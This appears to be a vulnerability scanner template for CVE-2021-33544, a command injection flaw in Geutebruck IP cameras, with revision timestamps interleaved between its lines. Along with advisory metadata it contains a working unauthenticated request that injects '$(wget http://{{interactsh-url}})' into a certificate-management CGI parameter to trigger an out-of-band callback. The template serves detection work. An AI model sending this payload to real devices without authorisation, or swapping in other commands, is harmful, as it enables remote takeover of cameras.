2021-07-12 04:10:31 +00:00
id : CVE-2021-33544
info :
2022-06-30 17:41:57 +00:00
name : Geutebruck - Remote Command Injection
2021-07-12 04:10:31 +00:00
author : gy741
2021-09-28 10:05:39 +00:00
severity : high
2022-06-30 17:41:57 +00:00
description : Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-07-12 04:10:31 +00:00
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
2022-05-17 09:18:12 +00:00
- https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/
- https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03
2022-06-30 17:41:57 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-33544
2021-09-28 10:05:39 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 7.2
2021-09-28 10:05:39 +00:00
cve-id : CVE-2021-33544
2023-07-11 19:49:27 +00:00
cwe-id : CWE-78
2023-08-31 11:46:18 +00:00
epss-score : 0.97529
epss-percentile : 0.99982
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : geutebrueck
product : g-cam_ebc-2110_firmware
tags : cve,cve2021,geutebruck,rce,oast
2021-07-12 04:10:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-12 04:10:31 +00:00
- raw :
- |
GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"